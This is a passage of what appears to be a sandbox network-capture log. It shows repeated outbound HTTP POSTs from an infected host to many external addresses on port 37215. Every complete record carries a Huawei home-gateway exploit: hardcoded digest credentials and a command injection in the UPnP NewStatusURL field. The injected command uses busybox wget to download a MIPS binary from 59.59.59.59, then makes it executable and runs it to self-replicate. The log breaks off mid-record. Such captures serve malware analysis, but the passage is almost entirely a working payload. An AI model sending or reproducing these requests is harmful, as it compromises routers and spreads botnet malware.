                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          239192.168.2.155026241.221.158.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563389063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          240192.168.2.1551098157.239.155.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563410044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          241192.168.2.1554574157.197.115.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563431978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          242192.168.2.1557178197.60.230.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563436031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          243192.168.2.1554350157.222.79.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563447952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          244192.168.2.1559334197.21.211.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563467026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          245192.168.2.1538448197.82.222.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563489914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          246192.168.2.1550424197.104.119.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563498020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          247192.168.2.1559394157.206.181.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:46.563514948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          248192.168.2.1552256138.53.60.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.525646925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
